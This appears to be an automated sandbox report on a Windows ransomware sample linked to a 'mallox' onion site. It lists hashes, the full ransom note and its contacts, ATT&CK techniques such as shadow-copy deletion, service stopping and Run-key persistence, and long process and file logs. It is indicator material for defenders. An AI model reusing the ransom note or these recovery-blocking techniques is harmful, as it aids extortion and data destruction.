22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3

General

Target

6cb1d245920799a1cc2dd8ee69e052d8.exe
Size

7KB
MD5

6cb1d245920799a1cc2dd8ee69e052d8
SHA1

29ff603adab927d52c4e9ec2746857ae26bdccc0
SHA256

22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3
SHA512

3d71f7380502281fd05bb57098bddc506b000c41b1ff89572282709f0dbc2b508d2e75d2157c4562ea2f6b8e9eea42006c01d8002ba142387865856ac7c52d99
SSDEEP

192:B/wgnOh5hs9+w226iGrk3wi3OV5Yi3zMWu3Wg:B/wgnx9+wAKwi3OVGi3zMWu3W

Score

10^/10

discovery evasion persistence ransomware

Malware Config

Extracted

Path

C:\FILE RECOVERY.txt

Ransom Note

Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: 50389A4962FA1F1A0847A133 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: [email protected] Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site.�

Emails

[email protected]

URLs

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

6cb1d245920799a1cc2dd8ee69e052d8.exe6cb1d245920799a1cc2dd8ee69e052d8.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	6cb1d245920799a1cc2dd8ee69e052d8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	6cb1d245920799a1cc2dd8ee69e052d8.exe

Modifies file permissions 1 TTPs 18 IoCs

discovery

File Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
1624	takeown.exe
4792	takeown.exe
1508	takeown.exe
2292	takeown.exe
3764	takeown.exe
4932	takeown.exe
932	takeown.exe
4104	takeown.exe
3260	takeown.exe
988	takeown.exe
5068	takeown.exe
2704	takeown.exe
3780	takeown.exe
2008	takeown.exe
1532	takeown.exe
3292	takeown.exe
4484	takeown.exe
2936	takeown.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

6cb1d245920799a1cc2dd8ee69e052d8.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Avbvlox = "\"C:\\Users\\Admin\\AppData\\Roaming\\Tntljlcbp\\Avbvlox.exe\""	6cb1d245920799a1cc2dd8ee69e052d8.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

6cb1d245920799a1cc2dd8ee69e052d8.exe

description	ioc	process
File opened (read-only)	\??\W:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\E:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\I:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\J:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\M:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\N:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\V:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\F:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\G:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\R:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\S:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\T:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\B:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\H:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\K:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\P:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\X:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\Y:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\Z:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\A:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\L:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\O:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\Q:	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened (read-only)	\??\U:	6cb1d245920799a1cc2dd8ee69e052d8.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

43 api.ipify.org
Suspicious use of SetThreadContext 1 IoCs

Processes:

6cb1d245920799a1cc2dd8ee69e052d8.exe

description pid process target process

PID 4696 set thread context of 5064 4696 6cb1d245920799a1cc2dd8ee69e052d8.exe 6cb1d245920799a1cc2dd8ee69e052d8.exe

flow	ioc
43	api.ipify.org

description	pid	process	target process
PID 4696 set thread context of 5064	4696	6cb1d245920799a1cc2dd8ee69e052d8.exe	6cb1d245920799a1cc2dd8ee69e052d8.exe

Drops file in Program Files directory 64 IoCs

Processes:

6cb1d245920799a1cc2dd8ee69e052d8.exe

description	ioc	process
File created	C:\Program Files\VideoLAN\VLC\locale\id\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Microsoft.Advertising\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART2.BDR	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\jvm.lib	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\HintBarEllipses.16.GrayF.png	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\es-es\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_zh_CN.jar	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\management\snmp.acl.template	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\mscss7cm_en.dub	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL121.XML	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365EduCloudEDUR_Subscription-ppd.xrm-ms	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\en-gb\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\it-it\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files\Windows Media Player\es-ES\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\lib\derbytools.jar	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_mac.css	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PROOF\MSHY7FR.LEX	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\cs-cz\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\AppxMetadata\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security.win32.x86_64_1.0.100.v20130327-1442.jar	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\ext\dnsns.jar	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Grace-ul-oob.xrm-ms	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_11811.1001.1813.0_neutral_~_8wekyb3d8bbwe\microsoft.system.package.metadata\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_SubTrial-pl.xrm-ms	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ug.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\sr-Latn-RS\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-il\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\db2v0801.xsl	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\ko\msipc.dll.mui	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription4-pl.xrm-ms	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Resources\RetailDemo\strings\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-pl.xrm-ms	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_SubTrial-ppd.xrm-ms	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-fr\FILE RECOVERY.txt	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_OEM_Perp-pl.xrm-ms	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Trial-ppd.xrm-ms	6cb1d245920799a1cc2dd8ee69e052d8.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusMSDNR_Retail-pl.xrm-ms	6cb1d245920799a1cc2dd8ee69e052d8.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
1380	sc.exe
4812	sc.exe
4320	sc.exe
384	sc.exe
1340	sc.exe
1628	sc.exe
4760	sc.exe
1344	sc.exe
1960	sc.exe
4936	sc.exe
4324	sc.exe
4376	sc.exe
1884	sc.exe
4696	sc.exe
4360	sc.exe
4748	sc.exe
4196	sc.exe
2752	sc.exe
688	sc.exe
3532	sc.exe
4132	sc.exe
1320	sc.exe
2772	sc.exe
3848	sc.exe
2092	sc.exe
1924	sc.exe
4284	sc.exe
2384	sc.exe
3944	sc.exe
3624	sc.exe
3680	sc.exe
3024	sc.exe
3360	sc.exe
1128	sc.exe
664	sc.exe
604	sc.exe
4976	sc.exe
3364	sc.exe
3996	sc.exe
1456	sc.exe
728	sc.exe
3940	sc.exe
3424	sc.exe
2376	sc.exe
2364	sc.exe
4144	sc.exe
264	sc.exe
936	sc.exe
4532	sc.exe
3716	sc.exe
4468	sc.exe
4776	sc.exe
1508	sc.exe
3288	sc.exe
1104	sc.exe
3760	sc.exe
2456	sc.exe
2180	sc.exe
3004	sc.exe
3824	sc.exe
5068	sc.exe
4100	sc.exe
3332	sc.exe
4952	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

1232 tasklist.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

3276 vssadmin.exe

pid	process
1232	tasklist.exe

pid	process
3276	vssadmin.exe

Kills process with taskkill 26 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4120	taskkill.exe
4012	taskkill.exe
2008	taskkill.exe
4376	taskkill.exe
2936	taskkill.exe
1300	taskkill.exe
3288	taskkill.exe
1716	taskkill.exe
1496	taskkill.exe
264	taskkill.exe
2980	taskkill.exe
3312	taskkill.exe
2808	taskkill.exe
4388	taskkill.exe
4760	taskkill.exe
1504	taskkill.exe
5112	taskkill.exe
4872	taskkill.exe
600	taskkill.exe
4688	taskkill.exe
3212	taskkill.exe
1192	taskkill.exe
4324	taskkill.exe
4700	taskkill.exe
1920	taskkill.exe
1180	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

6cb1d245920799a1cc2dd8ee69e052d8.exe6cb1d245920799a1cc2dd8ee69e052d8.exe

pid	process
4696	6cb1d245920799a1cc2dd8ee69e052d8.exe
4696	6cb1d245920799a1cc2dd8ee69e052d8.exe
4696	6cb1d245920799a1cc2dd8ee69e052d8.exe
4696	6cb1d245920799a1cc2dd8ee69e052d8.exe
5064	6cb1d245920799a1cc2dd8ee69e052d8.exe
5064	6cb1d245920799a1cc2dd8ee69e052d8.exe

Suspicious use of AdjustPrivilegeToken 41 IoCs

Processes:

6cb1d245920799a1cc2dd8ee69e052d8.exetakeown.exe6cb1d245920799a1cc2dd8ee69e052d8.exevssvc.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetasklist.exe

description	pid	process
Token: SeDebugPrivilege	4696	6cb1d245920799a1cc2dd8ee69e052d8.exe
Token: SeTakeOwnershipPrivilege	4792	takeown.exe
Token: SeTakeOwnershipPrivilege	5064	6cb1d245920799a1cc2dd8ee69e052d8.exe
Token: SeDebugPrivilege	5064	6cb1d245920799a1cc2dd8ee69e052d8.exe
Token: SeBackupPrivilege	2504	vssvc.exe
Token: SeRestorePrivilege	2504	vssvc.exe
Token: SeAuditPrivilege	2504	vssvc.exe
Token: SeTakeOwnershipPrivilege	2008	takeown.exe
Token: SeTakeOwnershipPrivilege	4104	takeown.exe
Token: SeTakeOwnershipPrivilege	2704	takeown.exe
Token: SeTakeOwnershipPrivilege	1532	takeown.exe
Token: SeTakeOwnershipPrivilege	988	takeown.exe
Token: SeTakeOwnershipPrivilege	3292	takeown.exe
Token: SeTakeOwnershipPrivilege	2936	takeown.exe
Token: SeDebugPrivilege	1716	taskkill.exe
Token: SeDebugPrivilege	4324	taskkill.exe
Token: SeDebugPrivilege	4700	taskkill.exe
Token: SeDebugPrivilege	1496	taskkill.exe
Token: SeDebugPrivilege	4120	taskkill.exe
Token: SeDebugPrivilege	264	taskkill.exe
Token: SeDebugPrivilege	4760	taskkill.exe
Token: SeDebugPrivilege	2980	taskkill.exe
Token: SeDebugPrivilege	1920	taskkill.exe
Token: SeDebugPrivilege	1504	taskkill.exe
Token: SeDebugPrivilege	4012	taskkill.exe
Token: SeDebugPrivilege	5112	taskkill.exe
Token: SeDebugPrivilege	4376	taskkill.exe
Token: SeDebugPrivilege	1180	taskkill.exe
Token: SeDebugPrivilege	4872	taskkill.exe
Token: SeDebugPrivilege	600	taskkill.exe
Token: SeDebugPrivilege	3312	taskkill.exe
Token: SeDebugPrivilege	2936	taskkill.exe
Token: SeDebugPrivilege	1300	taskkill.exe
Token: SeDebugPrivilege	2008	taskkill.exe
Token: SeDebugPrivilege	4688	taskkill.exe
Token: SeDebugPrivilege	2808	taskkill.exe
Token: SeDebugPrivilege	3288	taskkill.exe
Token: SeDebugPrivilege	4388	taskkill.exe
Token: SeDebugPrivilege	3212	taskkill.exe
Token: SeDebugPrivilege	1192	taskkill.exe
Token: SeDebugPrivilege	1232	tasklist.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6cb1d245920799a1cc2dd8ee69e052d8.execmd.exe6cb1d245920799a1cc2dd8ee69e052d8.execmd.exe

description	pid	process	target process
PID 4696 wrote to memory of 4892	4696	6cb1d245920799a1cc2dd8ee69e052d8.exe	cmd.exe
PID 4696 wrote to memory of 4892	4696	6cb1d245920799a1cc2dd8ee69e052d8.exe	cmd.exe
PID 4696 wrote to memory of 4892	4696	6cb1d245920799a1cc2dd8ee69e052d8.exe	cmd.exe
PID 4892 wrote to memory of 1320	4892	cmd.exe	reg.exe
PID 4892 wrote to memory of 1320	4892	cmd.exe	reg.exe
PID 4892 wrote to memory of 1320	4892	cmd.exe	reg.exe
PID 4892 wrote to memory of 4792	4892	cmd.exe	takeown.exe
PID 4892 wrote to memory of 4792	4892	cmd.exe	takeown.exe
PID 4892 wrote to memory of 4792	4892	cmd.exe	takeown.exe
PID 4892 wrote to memory of 3728	4892	cmd.exe	cmd.exe
PID 4892 wrote to memory of 3728	4892	cmd.exe	cmd.exe
PID 4892 wrote to memory of 3728	4892	cmd.exe	cmd.exe
PID 4892 wrote to memory of 3708	4892	cmd.exe	cacls.exe
PID 4892 wrote to memory of 3708	4892	cmd.exe	cacls.exe
PID 4892 wrote to memory of 3708	4892	cmd.exe	cacls.exe
PID 4892 wrote to memory of 3736	4892	cmd.exe	cmd.exe
PID 4892 wrote to memory of 3736	4892	cmd.exe	cmd.exe
PID 4892 wrote to memory of 3736	4892	cmd.exe	cmd.exe
PID 4892 wrote to memory of 3816	4892	cmd.exe	cacls.exe
PID 4892 wrote to memory of 3816	4892	cmd.exe	cacls.exe
PID 4892 wrote to memory of 3816	4892	cmd.exe	cacls.exe
PID 4696 wrote to memory of 3436	4696	6cb1d245920799a1cc2dd8ee69e052d8.exe	6cb1d245920799a1cc2dd8ee69e052d8.exe
PID 4696 wrote to memory of 3436	4696	6cb1d245920799a1cc2dd8ee69e052d8.exe	6cb1d245920799a1cc2dd8ee69e052d8.exe
PID 4696 wrote to memory of 3436	4696	6cb1d245920799a1cc2dd8ee69e052d8.exe	6cb1d245920799a1cc2dd8ee69e052d8.exe
PID 4696 wrote to memory of 4728	4696	6cb1d245920799a1cc2dd8ee69e052d8.exe	6cb1d245920799a1cc2dd8ee69e052d8.exe
PID 4696 wrote to memory of 4728	4696	6cb1d245920799a1cc2dd8ee69e052d8.exe	6cb1d245920799a1cc2dd8ee69e052d8.exe
PID 4696 wrote to memory of 4728	4696	6cb1d245920799a1cc2dd8ee69e052d8.exe	6cb1d245920799a1cc2dd8ee69e052d8.exe
PID 4696 wrote to memory of 5064	4696	6cb1d245920799a1cc2dd8ee69e052d8.exe	6cb1d245920799a1cc2dd8ee69e052d8.exe
PID 4696 wrote to memory of 5064	4696	6cb1d245920799a1cc2dd8ee69e052d8.exe	6cb1d245920799a1cc2dd8ee69e052d8.exe
PID 4696 wrote to memory of 5064	4696	6cb1d245920799a1cc2dd8ee69e052d8.exe	6cb1d245920799a1cc2dd8ee69e052d8.exe
PID 4696 wrote to memory of 5064	4696	6cb1d245920799a1cc2dd8ee69e052d8.exe	6cb1d245920799a1cc2dd8ee69e052d8.exe
PID 4696 wrote to memory of 5064	4696	6cb1d245920799a1cc2dd8ee69e052d8.exe	6cb1d245920799a1cc2dd8ee69e052d8.exe
PID 4696 wrote to memory of 5064	4696	6cb1d245920799a1cc2dd8ee69e052d8.exe	6cb1d245920799a1cc2dd8ee69e052d8.exe
PID 4696 wrote to memory of 5064	4696	6cb1d245920799a1cc2dd8ee69e052d8.exe	6cb1d245920799a1cc2dd8ee69e052d8.exe
PID 4696 wrote to memory of 5064	4696	6cb1d245920799a1cc2dd8ee69e052d8.exe	6cb1d245920799a1cc2dd8ee69e052d8.exe
PID 4696 wrote to memory of 5064	4696	6cb1d245920799a1cc2dd8ee69e052d8.exe	6cb1d245920799a1cc2dd8ee69e052d8.exe
PID 4696 wrote to memory of 5064	4696	6cb1d245920799a1cc2dd8ee69e052d8.exe	6cb1d245920799a1cc2dd8ee69e052d8.exe
PID 4892 wrote to memory of 744	4892	cmd.exe	cmd.exe
PID 4892 wrote to memory of 744	4892	cmd.exe	cmd.exe
PID 4892 wrote to memory of 744	4892	cmd.exe	cmd.exe
PID 4892 wrote to memory of 4288	4892	cmd.exe	cacls.exe
